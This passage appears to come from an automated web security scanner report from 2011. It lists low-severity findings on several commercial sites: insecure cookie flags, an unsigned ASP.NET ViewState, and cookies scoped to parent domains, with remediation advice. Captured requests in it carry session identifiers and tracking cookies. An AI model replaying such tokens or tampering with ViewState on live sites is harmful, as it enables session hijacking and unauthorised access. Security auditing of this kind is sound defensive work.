User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; NSC_CNX_21529_64.29.204.16=4f52b42b3661; mbox=PC#1295637745501-300919.17#1296864682|check#true#1295655142|session#1295655081531-668160#1295656942

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 20794
Content-Type: application/x-javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 22 Jan 2011 00:10:47 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:46 GMT;path=/

function WebForm_PostBackOptions(eventTarget, eventArgument, validation, validationGroup, actionUrl, trackFocus, clientSubmit) {
this.eventTarget = eventTarget;
this.eventArgument = eventArg
...[SNIP]...

7.7. https://www.bmwusa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:31:09 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; mbox=PC#1295637745501-300919.17#1296864682|check#true#1295655142|session#1295655081531-668160#1295656942; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; NSC_CNX_21529_64.29.204.16=4f52b42b3661

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.bmwusa.com/favicon.ico
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 150
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 00:11:09 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:31:09 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.bmwusa.com/favicon.ico">here</a>.</h2>
</body></html>

7.8. https://www.bmwusa.com/jsenvconst.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/jsenvconst.ashx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Sat, 22-Jan-11 00:30:43 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsenvconst.ashx HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349; WK9733P=JhuYOfcghHTiCqgKmpjCnVgApuKM86S2aIJ5l1grGrWiHX+M3QHtrjm/1B331Jqh; ASP.NET_SessionId=nt0wfon42yzcy5iixeimo055; NSC_CNX_21529_64.29.204.16=4f52b42b3661

Response

7.9. https://www.lowermybills.com/lending/home-refinance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowermybills.com
Path:	/lending/home-refinance/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

SERVER_COOKIE=173.193.214.243.1295638882514991; path=/; expires=Sun, 20-Jan-13 19:41:22 GMT
BIGipServerpl.lmb2prod=872685578.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lending/home-refinance/ HTTP/1.1
Host: www.lowermybills.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:22 GMT
Server: Apache
Set-Cookie: SERVER_COOKIE=173.193.214.243.1295638882514991; path=/; expires=Sun, 20-Jan-13 19:41:22 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
ETag: W/"1447-1295483253000"
Last-Modified: Thu, 20 Jan 2011 00:27:33 GMT
Content-Length: 1447
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerpl.lmb2prod=872685578.20480.0000; path=/

<html>
<head>
<title></title>
<script type="text/javascript" language="javascript">
var userInfo = {
urlParams: {
jsEnabled: "Y",
resolution: "",

...[SNIP]...

8. ASP.NET ViewState without MAC enabled previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.buyatoyota.com
Path:	/NationalLanding.aspx

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

Request

GET /NationalLanding.aspx HTTP/1.1
Host: www.buyatoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 21 Jan 2011 22:09:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: bgImage=Toyotathon_Flash_Piece; domain=.buyatoyota.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><!-- Page served fr
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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TGFuZGluZyBQYWdlIjsNCnMuc2VydmVyID0gInd3dy5idXlhdG95b3RhLmNvbSI7DQpzLmNoYW5uZWwgPSAiSG9tZSI7DQpkAgMPFgIfAgUVQkFUX19CWU9fQ29uZmlndXJhdG9yZAIJD2QWAmYPFgIfAgWWFzwhLS0gVDI6VGVtcGxhdGUgNywgVmlldyAxNTAsIFRhZyA1MDMgLS0+CjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4NCnZhciBnYUpzSG9zdCA9ICgoImh0dHBzOiIgPT0gZG9jdW1lbnQubG9jYXRpb24ucHJvdG9jb2wpID8gImh0dHBzOi8vc3NsLiIgOiAiaHR0cDovL3d3dy4iKTsNCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCIlM0NzY3JpcHQgc3JjPSciICsgZ2FKc0hvc3QgKyAiZ29vZ2xlLWFuYWx5dGljcy5jb20vZ2EuanMnIHR5cGU9J3RleHQvamF2YXNjcmlwdCclM0UlM0Mvc2NyaXB0JTNFIikpOw0KPC9zY3JpcHQ+DQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+DQp0cnkgew0KCQl2YXIgcGFnZVRyYWNrZXIgPSBfZ2F0Ll9nZXRUcmFja2VyKCJVQS0zMTYyMjMyLTEiKTsNCgkJcGFnZVRyYWNrZXIuX3RyYWNrUGFnZXZpZXcoKTsNCgl9IA0KY2F0Y2goZXJyKSANCgl7fQ0KPC9zY3JpcHQ+CjwhLS0gVDI6VGVtcGxhdGUgMTAsIFZpZXcgMTE4MiwgVGFnIDE2NTIgLS0+CjwhLS0gVGhpcyBwYWdlIGlzIHNob3dpbmcgdGFncyBmb3IgJ0dlbmVyaWMgVERBIGZvciBUYWdnaW5nJyAtICduYXRsYW5kaW5nJyAtLT4KPCEtLSBUMjpUZW1wbGF0ZSAxOSwgVmlldyA0MDM4LCBUYWcgMTI1MTcgLS0+CjwhLS0gU3RhcnQgb2YgRG91YmxlQ2xpY2sgU3BvdGxpZ2h0IFRhZzogUGxlYXNlIGRvIG5vdCByZW1vdmUtLT4gIDwhLS0gQWN0aXZpdHkgTmFtZSBmb3IgdGhpcyB0YWcgaXM6VG90YWwgVHJhZmZpY2sgLS0+ICA8IS0tIFdlYiBzaXRlIFVSTCB3aGVyZSB0YWcgc2hvdWxkIGJlIHBsYWNlZDogaHR0cDovL3d3dy50b3lvdGEuY29tIC0tPiAgPCEtLSBDcmVhdGlvbiBEYXRlOjA1LzIyLzIwMDIgLS0+PFNDUklQVCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+dmFyIGF4ZWwgPSBNYXRoLnJhbmRvbSgpKyIiO3ZhciBhID0gYXhlbCAqIDEwMDAwMDAwMDAwMDAwO2RvY3VtZW50LndyaXRlKCc8SU1HIFNSQz0iaHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZC9OMjcyNC5kZWR1cGVkX3Nwb3RsaWdodC9CMTAwOTIxMjtzej0xeDE7dGFnPXRvdGFsX3RyYWZmaWM7b3JkPScrIGEgKyAnPyIgV0lEVEg9MSBIRUlHSFQ9MSBCT1JERVI9MD4nKTs8L1NDUklQVD48Tk9TQ1JJUFQ+PElNRyBTUkM9Imh0dHA6Ly9hZC5kb3VibGVjbGljay5uZXQvYWQvTjI3MjQuZGVkdXBlZF9zcG90bGlnaHQvQjEwMDkyMTI7c3o9MXgxO3RhZz10b3RhbF90cmFmZmljO29yZD0xPyIgV0lEVEg9MSBIRUlHSFQ9MSBCT1JERVI9MD48L05PU0NSSVBUPiA8IS0tIEVuZCBvZiBEb3VibGVDbGljayBTcG90bGlnaHQgVGFnOiBQbGVhc2UgZG8gbm90IHJlbW92ZS0tPgo8IS0tIFQyOlRlbXBsYXRlIDI3LCBWaWV3IDQ0NDksIFRhZyAxMzAwMyAtLT4KPGltZyBzcmM9Imh0dHA6Ly9hZHMucmV2c2NpLm5ldC9hZHNlcnZlci9ha28/cnNpX25vYWRzPTEmcnNpX3BpeGVsPTEmcnNpX2FjY291bnQ9Qjc5MUNEQzMzRTc1MDk1RTUxQURDODBDNkNCMzFCMTcmcnNpX3NpdGU9QjNCRUM1QjQ1MzVGQkY3MDU3RkFBMTBCQTM2MkMzQzUmcnNpX2V2ZW50PUE5MEJDRTg4NzREOUY0NjE1NkY4NkFEREJDRUZDQ0EzIi8+CjwhLS0gVDI6VGVtcGxhdGUgMzQsIFZpZXcgNDQ2NiwgVGFnIDEzMDI2IC0tPgo8IS0tIFRhZyBmb3IgQWN0aXZpdHkgR3JvdXA6IEdTVCBTcGVjaWFsIE9mZmVycywgQWN0aXZpdHkgTmFtZTogTmF0aW9uYWwgSG9tZVBhZ2UsIEFjdGl2aXR5IElEOiA2MjY3MjQgLS0+DQo8IS0tIEV4cGVjdGVkIFVSTDogaHR0cDovL3d3dy5ndWxmc3RhdGVzLmJ1eWF0b3lvdGEuY29tL05hdGlvbmFsTGFuZGluZy5hc3B4IC0tPg0KDQo8IS0tDQpTdGFydCBvZiBEb3VibGVDbGljayBGbG9vZGxpZ2h0IFRhZzogUGxlYXNlIGRvIG5vdCByZW1vdmUNCkFjdGl2aXR5IG5hbWUgb2YgdGhpcyB0YWc6IE5hdGlvbmFsIEhvbWVQYWdlDQpVUkwgb2YgdGhlIHdlYnBhZ2Ugd2hlcmUgdGhlIHRhZyBpcyBleHBlY3RlZCB0byBiZSBwbGFjZWQ6IGh0dHA6Ly93d3cuZ3VsZnN0YXRlcy5idXlhdG95b3RhLmNvbS9OYXRpb25hbExhbmRpbmcuYXNweA0KVGhpcyB0YWcgbXVzdCBiZSBwbGFjZWQgYmV0d2VlbiB0aGUgPGJvZHk+IGFuZCA8L2JvZHk+IHRhZ3MsIGFzIGNsb3NlIGFzIHBvc3NpYmxlIHRvIHRoZSBvcGVuaW5nIHRhZy4NCkNyZWF0aW9uIERhdGU6IDAzLTEwLTIwMTANCi0tPg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIGlkPSJEb3VibGVDbGlja0Zsb29kbGlnaHRUYWc2MjY3MjQiPg0KLy88IVtDREFUQVsNCnZhciBheGVsID0gTWF0aC5yYW5kb20oKSArICIiOw0KdmFyIGEgPSBheGVsICogMTAwMDAwMDAwMDAwMDA7DQp2YXIgbmV3SUZyYW1lPWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImlmcmFtZSIpOw0KbmV3SUZyYW1lLnNyYz0iaHR0cDovL2Zscy5kb3VibGVjbGljay5uZXQvYWN0aXZpdHlpO3NyYz0yNTgwMjg0O3R5cGU9dGRhaG8yNjA7Y2F0PW5hdGlvNTM4O3UxPURNQTtvcmQ9IiArIGEgKyAiPyI7DQpuZXdJRnJhbWUud2lkdGg9IjEiOw0KbmV3SUZyYW1lLmZyYW1lQm9yZGVyPSIwIjsNCm5ld0lGcmFtZS5oZWlnaHQ9IjEiOw0KdmFyIHNjcmlwdE5vZGU9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkRvdWJsZUNsaWNrRmxvb2RsaWdodFRhZzYyNjcyNCIpOw0Kc2NyaXB0Tm9kZS5wYXJlbnROb2RlLmluc2VydEJlZm9yZShuZXdJRnJhbWUsc2NyaXB0Tm9kZSk7DQovL11dPg0KPC9zY3JpcHQ+DQo8bm9zY3JpcHQ+DQo8aWZyYW1lIHNyYz0iaHR0cDovL2Zscy5kb3VibGVjbGljay5uZXQvYWN0aXZpdHlpO3NyYz0yNTgwMjg0O3R5cGU9dGRhaG8yNjA7Y2F0PW5hdGlvNTM4O3UxPURNQTtvcmQ9MT8iIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4NCjwvbm9zY3JpcHQ+DQoNCjwhLS0gRW5kIG9mIERvdWJsZUNsaWNrIEZsb29kbGlnaHQgVGFnOiBQbGVhc2UgZG8gbm90IHJlbW92ZSAtLT4KZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAwUTaW1nYnRuU3VibWl0WmlwY29kZQUWaW1nYnRuU3VibWl0RGVhbGVyTmFtZQUVaW1nYnRuU3VibWl0Q2l0eVN0YXRl" />
...[SNIP]...

9. Cookie scoped to parent domain previous next
There are 27 instances of this issue:

http://www.directstartv.com/
http://www.edfed.com/
http://www.employmentauthority.com/
http://www.hound.com/
http://www.hound.com/gjsearchresult.php
http://www.lawcrossing.com/
http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/
http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/
http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/
http://www.lawcrossing.com/lcjssearchresults.php
http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php
http://www.legalauthority.com/
http://www.legalauthority.com/signup.php
http://www.opensource.org/licenses/gpl-license.php
http://www.opensource.org/licenses/mit-license.php
http://www.resumeboomer.com/
http://www.toyota.com/byt/pub/init.do
http://www.answers.com/topic/vinson-elkins-llp
http://www.buyatoyota.com/NationalLanding.aspx
http://www.facebook.com/BMWUSA
http://www.facebook.com/EmploymentXing
http://www.facebook.com/campaign/impression.php
http://www.facebook.com/campaign/landing.php
http://www.facebook.com/pages/JD2B/298408284363
http://www.facebook.com/piyush.v.bhatt
http://www.facebook.com/profile.php
http://www.facebook.com/yahoonews

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

9.1. http://www.directstartv.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.directstartv.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=hj0vosufv45apdqnbbc9nqnia2; path=/; domain=.directstartv.com
Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Keyword=deleted; expires=Thu, 21-Jan-2010 18:40:27 GMT; path=/; domain=.directstartv.com
EngineID=deleted; expires=Thu, 21-Jan-2010 18:40:27 GMT; path=/; domain=.directstartv.com
VisitorID=148176080; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
VisitID=160462422; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
lpd=default; expires=Tue, 22-Mar-2011 18:40:28 GMT; path=/; domain=.directstartv.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.2. http://www.edfed.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.edfed.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=esnafiva63v7f9obfldsvpdko0; path=/; domain=edfed.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.edfed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.3. http://www.employmentauthority.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.employmentauthority.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/; domain=.employmentauthority.com
PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/; domain=.employmentauthority.com
PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/; domain=.employmentauthority.com

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.employmentauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.4. http://www.hound.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.hound.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=a827dr0sigiku3i02l6760rfb1; path=/; domain=hound.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?utm_source=JDJournal&utm_medium=Banner&utm_campaign=125x125\ HTTP/1.1
Host: www.hound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.5. http://www.hound.com/gjsearchresult.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.hound.com
Path:	/gjsearchresult.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=d9q7enc1nis5276b2qurtlt332; path=/; domain=hound.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gjsearchresult.php HTTP/1.1
Host: www.hound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 21 Jan 2011 19:34:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=d9q7enc1nis5276b2qurtlt332; path=/; domain=hound.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: gjsearch.php?q=&l=
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

9.6. http://www.lawcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.lawcrossing.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=gs1oh9i6kad359a0jna6e84qs7; path=/; domain=lawcrossing.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.7. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.lawcrossing.com
Path:	/article/6070/Brooklyn-Law-School/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=vl8einafm1n540cl32q4l331g3; path=/; domain=lawcrossing.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /article/6070/Brooklyn-Law-School/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.8. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.lawcrossing.com
Path:	/article/6154/Anne-Healy-LIDS/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=kn84m4kfq0k9i5413blcf4rdv5; path=/; domain=lawcrossing.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /article/6154/Anne-Healy-LIDS/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.9. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.lawcrossing.com
Path:	/images/banner/lc_bannerforjdj125x125.gif/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PHPSESSID=d2dplbacjvjkr67gtesru8aj04; path=/; domain=lawcrossing.com

